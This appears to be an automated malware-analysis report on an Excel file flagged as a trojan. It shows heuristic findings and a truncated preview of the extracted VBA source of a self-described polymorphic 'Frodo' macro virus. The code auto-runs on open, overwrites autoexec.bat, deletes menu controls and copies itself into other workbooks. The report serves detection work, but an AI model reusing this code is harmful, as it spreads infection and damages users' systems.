MALICIOUS
320
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is identified as malicious by ClamAV as Xls.Trojan.Cartel-1. It contains an AutoOpen VBA macro that uses obfuscated code, CreateObject, and Shell() calls. This indicates the macro is designed to execute arbitrary code, likely downloading and running a secondary payload.
Heuristics 7
-
ClamAV: Xls.Trojan.Cartel-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Trojan.Cartel-1
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 23915 bytes |
SHA-256: fd7441998ecd6a355bd317a108182dbdf2ca8a60a4f12b4bc5eaf775d266aa3e |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Foglio1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Foglio2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Foglio3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Modulo1"
' -------------------------------
' - Frodo.vba.Excel Virus v 1.0 -
' - based on the parasite virus -
' - Using polymorphic and string-
' - encryption -
' -------------------------------
Sub AutoOpen() ' autoexecute on open
Application.OnSheetActivate = "frodo" ' attach the procedure (Frodo) to
the SheetActivate event
Call Mail ' Call Mail Procedure
End Sub
Sub frodo()
On Error Resume Next
vname = crypt("gsnen")
dwp = crypt("Qdsrno`m/ymr")
dvp = Application.StartupPath & "\" & dwb
counter1 = 0
Counter2 = 0
With Application
.ScreenUpdating = False
.DisplayAlert = False
.EnableCancelKey = xlDisabled
End With
Set cb = CommandBars
Set ctrl = Controls
cb("Tools").ctrl(10).Delete: cb("Tools").ctrl(12).Delete
cb("View").ctrl(3).Delete: cb("Window").ctrl(3).Delete
cb("Window").ctrl(4).Delete
Call Polymorph ' Start Polymorphic Engine
Randomize
If Int((Rnd * 10) + 1) = 10 Then
Application.Caption = crypt("Gsnen!Mhwdr!rnldvidsd!ho!Uhld")
Application.StatusBar = crypt("Dybdm!Rtyy")
Open "c:\autoexec.bat" For Output Access Write As 1
Print #1, "@Echo off"
Print #1, "Echo ---------------------------"
Print #1, "Echo - You owned by Frodo -"
Print #1, "Echo - greets to Mr Shaer -"
Print #1, "Echo - 28.03.2002 -"
Print #1, "Echo - (C)by Dark Eclipse -"
Print #1, "Echo ---------------------------"
Close 1
End If
If Month(Now) = 22 And Day(Now) = 5 Then Call bla
If Month(Now) = 23 And Day(Now) = 5 Then Call blubb
Application.VBE.ActiveVBProject.VBComponents.Item(vname).Export
Application.StartupPath & "\" & crypt("shofd/ymr/c`r")
If Dir(dvp) = dwp Then Counter2 = 1
For X = 1 To ActiveWorkbook.VBProject.VBComponents.Count
If ActiveWorkbook.VBProject.VBComponents(X).Name = vname Then counter1 = 1
Next X
If counter1 = 0 Then
ActiveWorkbook.VBProject.VBComponents.Import Application.StartupPath & "\"
& crypt("shofd/ymr/c`r")
ActiveWorkbook.Save
End If
If Counter2 = 0 Then
Workbook.Add.SaveAs FileName:=dvp
ActiveWorkbook.VBProject.VBComponents.Import Application.StartupPath & "\"
& crypt("shofd/ymr/c`r")
ActiveWindow.Visible = False
Workbook(dwp).Save
End If
End Sub
Sub bla()
On Error Resume Next
CommandBars("Edit").Enabled = False: CommandBars("Insert").Enabled = False
CommandBars("Files").Enabled = False: CommandBard("Tools").Enabled = False
End Sub
Sub blubb()
On Error Resume Next
CommandBars("Edit").Enabled = True: CommandBars("Insert").Enabled = True
CommandBars("Files").Enabled = True: CommandBars("Tools").Enabled = True
End Sub
Sub ViewVBCode()
MsgBox Chr(84) + Chr(104) + Chr(105) + Chr(115) + Chr(32) + Chr(118) +
Chr(101) +
Chr(114) + Chr(115) + Chr(105) + Chr(111) + Chr(110) + Chr(32) + Chr(111) +
Chr(102) +
Chr(32) + Chr(77) + Chr(105) + Chr(99) + Chr(114) + Chr(111) + Chr(115) +
Chr(111) +
Chr(102) + Chr(116) + Chr(32) + C
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.